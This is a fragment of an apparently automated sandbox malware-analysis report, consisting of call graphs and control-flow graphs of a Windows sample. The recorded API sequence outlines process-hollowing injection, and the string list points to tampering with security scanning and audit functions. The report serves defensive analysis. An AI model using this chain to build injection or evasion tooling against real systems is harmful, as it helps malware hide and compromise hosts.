2a04edc 37870 2a04ee9 37869->37870 37873 2a04ef0 37869->37873 37875 2a04c38 37870->37875 37881 2a04c50 37873->37881 37876 2a04c4c 37875->37876 37877 2a04c3c SysAllocStringLen 37875->37877 37876->37873 37877->37876 37878 2a04c30 37877->37878 37879 2a04f26 SysAllocStringLen 37878->37879 37880 2a04f3c 37878->37880 37879->37878 37879->37880 37880->37873 37882 2a04c56 SysFreeString 37881->37882 37883 2a04c5c 37881->37883 37882->37883 37884 2a01c6c 37885 2a01d04 37884->37885 37886 2a01c7c 37884->37886 37887 2a01f58 37885->37887 37888 2a01d0d 37885->37888 37889 2a01cc0 37886->37889 37890 2a01c89 37886->37890 37891 2a01fec 37887->37891 37896 2a01f68 37887->37896 37897 2a01fac 37887->37897 37892 2a01d25 37888->37892 37906 2a01e24 37888->37906 37893 2a01724 10 API calls 37889->37893 37894 2a01c94 37890->37894 37932 2a01724 37890->37932 37899 2a01d2c 37892->37899 37902 2a01d48 37892->37902 37908 2a01dfc 37892->37908 37917 2a01cd7 37893->37917 37900 2a01724 10 API calls 37896->37900 37903 2a01fb2 37897->37903 37909 2a01724 10 API calls 37897->37909 37898 2a01e7c 37901 2a01724 10 API calls 37898->37901 37905 2a01e95 37898->37905 37904 2a01f82 37900->37904 37907 2a01f2c 37901->37907 37911 2a01d79 Sleep 37902->37911 37912 2a01d9c 37902->37912 37925 2a01a8c 8 API calls 37904->37925 37927 2a01fa7 37904->37927 37906->37898 37906->37905 37910 2a01e55 Sleep 37906->37910 37907->37905 37926 2a01a8c 8 API calls 37907->37926 37913 2a01724 10 API calls 37908->37913 37919 2a01fc1 37909->37919 37910->37898 37914 2a01e6f Sleep 37910->37914 37911->37912 37915 2a01d91 Sleep 37911->37915 37921 2a01e05 37913->37921 37914->37906 37915->37902 37916 2a01ca1 37924 2a01cb9 37916->37924 37956 2a01a8c 37916->37956 37918 2a01a8c 8 API calls 37917->37918 37923 2a01cfd 37917->37923 37918->37923 37919->37927 37928 2a01a8c 8 API calls 37919->37928 37922 2a01e1d 37921->37922 37930 2a01a8c 8 API calls 37921->37930 37925->37927 37929 2a01f50 37926->37929 37931 2a01fe4 37928->37931 37930->37922 37933 2a01968 37932->37933 37934 2a0173c 37932->37934 37935 2a01a80 37933->37935 37936 2a01938 37933->37936 37943 2a017cb Sleep 37934->37943 37944 2a0174e 37934->37944 37937 2a01684 VirtualAlloc 37935->37937 37938 2a01a89 37935->37938 37942 2a01947 Sleep 37936->37942 37949 2a01986 37936->37949 37940 2a016bf 37937->37940 37941 2a016af 37937->37941 37938->37916 37939 2a0175d 37939->37916 37940->37916 37973 2a01644 37941->37973 37947 2a0195d Sleep 37942->37947 37942->37949 37943->37944 37948 2a017e4 Sleep 37943->37948 37944->37939 37945 2a0182c 37944->37945 37950 2a0180a Sleep 37944->37950 37951 2a01838 37945->37951 37979 2a015cc 37945->37979 37947->37936 37948->37934 37952 2a019a4 37949->37952 37953 2a015cc VirtualAlloc 37949->37953 37950->37945 37954 2a01820 Sleep 37950->37954 37951->37916 37952->37916 37953->37952 37954->37944 37957 2a01aa1 37956->37957 37958 2a01b6c 37956->37958 37960 2a01aa7 37957->37960 37963 2a01b13 Sleep 37957->37963 37959 2a016e8 37958->37959 37958->37960 37962 2a01c66 37959->37962 37964 2a01644 2 API calls 37959->37964 37961 2a01ab0 37960->37961 37966 2a01b4b Sleep 37960->37966 37969 2a01b81 37960->37969 37961->37924 37962->37924 37963->37960 37965 2a01b2d Sleep 37963->37965 37967 2a016f5 VirtualFree 37964->37967 37965->37957 37968 2a01b61 Sleep 37966->37968 37966->37969 37970 2a0170d 37967->37970 37968->37960 37971 2a01c00 VirtualFree 37969->37971 37972 2a01ba4 37969->37972 37970->37924 37971->37924 37972->37924 37974 2a01681 37973->37974 37975 2a0164d 37973->37975 37974->37940 37975->37974 37976 2a0164f Sleep 37975->37976 37977 2a01664 37976->37977 37977->37974 37978 2a01668 Sleep 37977->37978 37978->37975 37983 2a01560 37979->37983 37981 2a015d4 VirtualAlloc 37982 2a015eb 37981->37982 37982->37951 37984 2a01500 37983->37984 37984->37981 37985 2a2d2fc 37995 2a0656c 37985->37995 37989 2a2d32a 38000 2a2c35c timeSetEvent 37989->38000 37991 2a2d334 37992 2a2d342 GetMessageA 37991->37992 37993 2a2d352 37992->37993 37994 2a2d336 TranslateMessage DispatchMessageA 37992->37994 37994->37992 37996 2a06577 37995->37996 38001 2a04198 37996->38001 37999 2a042ac SysFreeString SysReAllocStringLen SysAllocStringLen 37999->37989 38000->37991 38002 2a041de 38001->38002 38003 2a04257 38002->38003 38004 2a043e8 38002->38004 38015 2a04130 38003->38015 38006 2a04419 38004->38006 38007 2a0442a 38004->38007 38020 2a0435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38006->38020 38011 2a0446f FreeLibrary 38007->38011 38012 2a04493 38007->38012 38010 2a04423 38010->38007 38011->38007 38013 2a044a2 ExitProcess 38012->38013 38014 2a0449c 38012->38014 38014->38013 38016 2a04140 38015->38016 38017 2a04173 38015->38017 38016->38017 38019 2a015cc VirtualAlloc 38016->38019 38021 2a05868 38016->38021 38017->37999 38019->38016 38020->38010 38022 2a05878 GetModuleFileNameA 38021->38022 38024 2a05894 38021->38024 38025 2a05acc GetModuleFileNameA RegOpenKeyExA 38022->38025 38024->38016 38026 2a05b4f 38025->38026 38027 2a05b0f RegOpenKeyExA 38025->38027 38043 2a05908 12 API calls 38026->38043 38027->38026 38028 2a05b2d RegOpenKeyExA 38027->38028 38028->38026 38030 2a05bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 38028->38030 38033 2a05cf2 38030->38033 38034 2a05c0f 38030->38034 38031 2a05b74 RegQueryValueExA 38032 2a05b94 RegQueryValueExA 38031->38032 38036 2a05bb2 RegCloseKey 38031->38036 38032->38036 38033->38024 38034->38033 38035 2a05c1f lstrlenA 38034->38035 38038 2a05c37 38035->38038 38036->38024 38038->38033 38039 2a05c84 38038->38039 38040 2a05c5c lstrcpynA LoadLibraryExA 38038->38040 38039->38033 38041 2a05c8e lstrcpynA LoadLibraryExA 38039->38041 38040->38039 38041->38033 38042 2a05cc0 lstrcpynA LoadLibraryExA 38041->38042 38042->38033 38043->38031

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 6027 2a18d70-2a18d73 6028 2a18d78-2a18d7d 6027->6028 6028->6028 6029 2a18d7f-2a18e66 call 2a04990 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 6028->6029 6060 2a1a8b7-2a1a921 call 2a04500 * 2 call 2a04c60 call 2a04500 call 2a044dc call 2a04500 * 2 6029->6060 6061 2a18e6c-2a18f47 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 6029->6061 6061->6060 6105 2a18f4d-2a19275 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a030d4 * 2 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04de0 call 2a04df0 call 2a18788 6061->6105 6214 2a19277-2a192e3 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 6105->6214 6215 2a192e8-2a19609 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a02ee0 call 2a02f08 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 GetThreadContext 6105->6215 6214->6215 6215->6060 6323 2a1960f-2a19872 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a18400 6215->6323 6396 2a19878-2a199e1 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a18670 6323->6396 6397 2a19b7f-2a19bea call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 6323->6397 6487 2a199e3-2a19a09 call 2a17a2c 6396->6487 6488 2a19a0b-2a19a76 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 6396->6488 6423 2a19bf0-2a19d70 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a17a2c 6397->6423 6424 2a19beb call 2a189d0 6397->6424 6423->6060 6527 2a19d76-2a19e6f call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a18c80 6423->6527 6424->6423 6497 2a19a7c-2a19b73 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a17a2c 6487->6497 6488->6497 6528 2a19a77 call 2a189d0 6488->6528 6567 2a19b78-2a19b7d 6497->6567 6579 2a19e71-2a19ebe call 2a18b78 call 2a18b6c 6527->6579 6580 2a19ec3-2a1a61b call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a17d78 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a17d78 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 SetThreadContext NtResumeThread call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a02c2c call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1894c * 3 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 6527->6580 6528->6497 6567->6423 6579->6580 6805 2a1a620-2a1a8b2 call 2a1894c * 2 call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c * 5 call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a18080 call 2a1894c * 2 6580->6805 6805->6060
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A189D0: FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA
                                                                                                                                  • Part of subcall function 02A18788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A18814
                                                                                                                                • GetThreadContext.KERNEL32(000008A8,02A87424,ScanString,02A873A8,02A1A93C,UacInitialize,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,UacInitialize,02A873A8), ref: 02A19602
                                                                                                                                  • Part of subcall function 02A18400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A18471
                                                                                                                                  • Part of subcall function 02A18670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02A186D5
                                                                                                                                  • Part of subcall function 02A17A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A17A9F
                                                                                                                                  • Part of subcall function 02A17D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A17DEC
                                                                                                                                • SetThreadContext.KERNEL32(000008A8,02A87424,ScanBuffer,02A873A8,02A1A93C,ScanString,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,000008A4,00326FF8,02A874FC,00000004,02A87500), ref: 02A1A317
                                                                                                                                • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008A8,00000000,000008A8,02A87424,ScanBuffer,02A873A8,02A1A93C,ScanString,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,000008A4,00326FF8,02A874FC), ref: 02A1A324
                                                                                                                                  • Part of subcall function 02A1894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,UacScan), ref: 02A18960
                                                                                                                                  • Part of subcall function 02A1894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A1897A
                                                                                                                                  • Part of subcall function 02A1894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize), ref: 02A189B6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                • API String ID: 2388221946-51457883
                                                                                                                                • Opcode ID: 2e5cb7114070bce631d0558db37b5b81c45befe7e46512587efe74950feec27f
                                                                                                                                • Instruction ID: 8e8bedcefa3b5d48f6beaa8f6ced2d76c69442c9ad3859460c877f7fbf4000b3
                                                                                                                                • Opcode Fuzzy Hash: 2e5cb7114070bce631d0558db37b5b81c45befe7e46512587efe74950feec27f
                                                                                                                                • Instruction Fuzzy Hash: 0DE22E34A815589FDB11EB64EEC0BDE73BABF88310F1041A1E105AB259DE30EE95CF95

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 6883 2a18d6e-2a18d73 6885 2a18d78-2a18d7d 6883->6885 6885->6885 6886 2a18d7f-2a18e66 call 2a04990 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 6885->6886 6917 2a1a8b7-2a1a921 call 2a04500 * 2 call 2a04c60 call 2a04500 call 2a044dc call 2a04500 * 2 6886->6917 6918 2a18e6c-2a18f47 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 6886->6918 6918->6917 6962 2a18f4d-2a19275 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a030d4 * 2 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04de0 call 2a04df0 call 2a18788 6918->6962 7071 2a19277-2a192e3 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 6962->7071 7072 2a192e8-2a19609 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a02ee0 call 2a02f08 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 GetThreadContext 6962->7072 7071->7072 7072->6917 7180 2a1960f-2a19872 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a18400 7072->7180 7253 2a19878-2a199e1 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a18670 7180->7253 7254 2a19b7f-2a19bea call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 7180->7254 7344 2a199e3-2a19a09 call 2a17a2c 7253->7344 7345 2a19a0b-2a19a76 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 7253->7345 7280 2a19bf0-2a19d70 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a17a2c 7254->7280 7281 2a19beb call 2a189d0 7254->7281 7280->6917 7384 2a19d76-2a19e6f call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a18c80 7280->7384 7281->7280 7354 2a19a7c-2a19b7d call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a17a2c 7344->7354 7345->7354 7385 2a19a77 call 2a189d0 7345->7385 7354->7280 7436 2a19e71-2a19ebe call 2a18b78 call 2a18b6c 7384->7436 7437 2a19ec3-2a1a8b2 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a17d78 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a17d78 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 SetThreadContext NtResumeThread call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a02c2c call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1894c * 3 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1894c * 2 call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c * 5 call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a18080 call 2a1894c * 2 7384->7437 7385->7354 7436->7437 7437->6917
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A189D0: FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA
                                                                                                                                  • Part of subcall function 02A18788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A18814
                                                                                                                                • GetThreadContext.KERNEL32(000008A8,02A87424,ScanString,02A873A8,02A1A93C,UacInitialize,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,UacInitialize,02A873A8), ref: 02A19602
                                                                                                                                  • Part of subcall function 02A18400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A18471
                                                                                                                                  • Part of subcall function 02A18670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02A186D5
                                                                                                                                  • Part of subcall function 02A17A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A17A9F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                • API String ID: 3386062106-51457883
                                                                                                                                • Opcode ID: 2975572fd1054efc7d5f74f72d4a5af85862ed3e9c2e96967289dbcb705398f7
                                                                                                                                • Instruction ID: 038e9048143279bdc2de389b2b3cd14c0a3f288442a1ec2fc3e196b1353a78ab
                                                                                                                                • Opcode Fuzzy Hash: 2975572fd1054efc7d5f74f72d4a5af85862ed3e9c2e96967289dbcb705398f7
                                                                                                                                • Instruction Fuzzy Hash: 78E23E34A815589FDB11EB64EEC0BDE73BABF88310F1041A1E105AB259DE30EE95CF95

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
